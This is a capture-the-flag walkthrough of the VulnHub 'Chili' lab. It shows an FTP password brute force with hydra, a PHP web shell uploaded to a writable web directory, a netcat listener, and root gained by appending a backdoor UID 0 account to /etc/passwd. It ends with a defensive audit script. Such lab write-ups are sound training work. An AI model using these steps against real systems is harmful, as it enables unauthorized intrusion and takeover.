
This post provides a lot of very useful knowledge; lab it and record a video if you can…

Introduction

Summary

This one was a pretty tricky box that I enjoyed a lot! It's easy, but you have to think smart. We start by brute-forcing FTP, which gives us access to all system files; we search for a writable directory under /var/www/html and place our shell there. Privilege escalation to root is easy: /etc/passwd is writable. Let's pwn it! :sunglasses:

Enumeration/Reconnaissance

Let’s start as always with nmap.

$ ip=192.168.1.13
$ nmap -p- --min-rate 10000 $ip

Port 80 has nothing interesting: I checked /robots.txt and tried directory brute force with gobuster using many wordlists, but found nothing. Then I checked the hint the author provided on the VulnHub page: "If you ever get stuck, try again with the name of the lab". Ah, here we go: let's brute-force FTP using the username chili (it takes some time).

$ hydra -l chili -P /usr/share/wordlists/rockyou.txt $ip ftp
[ftp] host: 192.168.1.13   login: chili   password: a1b2c3d4

Shell as www-data

Perfect, we can log in as chili:a1b2c3d4. I enumerated the system, but there is no SSH, so the only option left is to upload a shell under /var/www/html, which itself isn't writable. There is, however, a hidden folder under /var/www/html that is writable:

$ ftp $ip
ftp> cd /var/www/html
ftp> ls -la
drwxr-xr-x 4 0 0  4096 Sep 08 13:12 .
drwxr-xr-x 3 0 0  4096 Sep 08 11:41 ..
drwxrwxrwx 2 0 0  4096 Sep 08 13:14 .nano   <-----
drwxr-xr-x 2 0 0  4096 Sep 08 13:12 .vim
-rw-r--r-- 1 0 0 74290 Oct 23  2018 Chile_WEB.jpg
-rw-r--r-- 1 0 0   657 Sep 08 11:44 index.html
226 Directory send OK.

Let’s upload a php web shell under .nano and make it executable.

ftp> cd .nano
ftp> put shell.php
ftp> chmod 007 shell.php

Now let’s execute it & get shell.

$ curl http://$ip/.nano/shell.php

$ nc -lvp 5555
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@chili:/$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Shell as chili

We can use the same FTP password to privesc to user chili now.

www-data@chili:/$ su - chili
Password: a1b2c3d4
chili@chili:~$ whoami;id
chili
uid=1000(chili) gid=1000(chili) groups=1000(chili),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

Shell as root

After some enumeration, I found that /etc/passwd is world-writable. Let's simply add a root user to it.

chili@chili:~$ ls -la /etc/passwd
-rw-r--rw- 1 root root 1450 Sep 8 12:23 /etc/passwd

Let’s generate a password:

$ openssl passwd -6 -salt xyz pwned
$6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1

Now we can add our user in.

chili@chili:~$ echo 'pwned:$6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1:0:0::/root:/bin/bash' >> /etc/passwd
chili@chili:~$ su - pwned
Password: pwned
root@chili:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Let’s read the flag.

root@chili:~# cat proof.txt
Sun_CSR.Chili.af6d45da1f1181347b9e2139f23c6a5b
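The two misconfigurations this box chains together, a world-writable directory inside the web root and a world-writable /etc/passwd that ends up with an extra UID 0 account, are easy to audit from the defender's side. The Python script below is an added example and not part of the original write-up; it assumes a Linux host and uses a constructed passwd sample that includes the pwned line shown above.

```python
"""Audit the two weaknesses this box chains together: a world-writable
directory inside the web root and a writable /etc/passwd carrying an
extra UID 0 account. Added example; not the write-up's own code."""
import os
import stat

def world_writable(mode: int) -> bool:
    """True when the 'others' write bit is set (-rw-r--rw- == 0o646)."""
    return bool(mode & stat.S_IWOTH)

def world_writable_dirs(root: str) -> list:
    """Walk a web root and return directories anyone can write into."""
    found = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            full = os.path.join(dirpath, d)
            try:
                if world_writable(os.lstat(full).st_mode):
                    found.append(full)
            except OSError:
                continue  # unreadable entry: skip rather than abort
    return found

def passwd_findings(passwd_text: str) -> dict:
    """Flag UID 0 accounts other than root, and entries whose password
    field is not 'x' (inline hash or empty password bypasses /etc/shadow)."""
    findings = {"extra_uid0": [], "not_shadowed": []}
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line, not a valid passwd entry
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings["extra_uid0"].append(name)
        if pw != "x":
            findings["not_shadowed"].append(name)
    return findings

# Constructed sample: normal entries plus the backdoor line from the write-up.
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "chili:x:1000:1000::/home/chili:/bin/bash\n"
    "pwned:$6$xyz$5I4IoAWqNNcGCYvBCeIz0UZr5NoOPvvHrwR9B1AX7.1fYnHX3clTDW9YRVi3TYivXiJ8Mb8clrGt7.gTxZGXb1:0:0::/root:/bin/bash\n"
)

if __name__ == "__main__":  # stand-alone run on a Linux host
    print(passwd_findings(SAMPLE_PASSWD), world_writable_dirs("/var/www/html"))
```

Run it from cron or a config-management check: on this box it would report the .nano directory under /var/www/html and, after the privesc, the pwned account in both findings lists.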


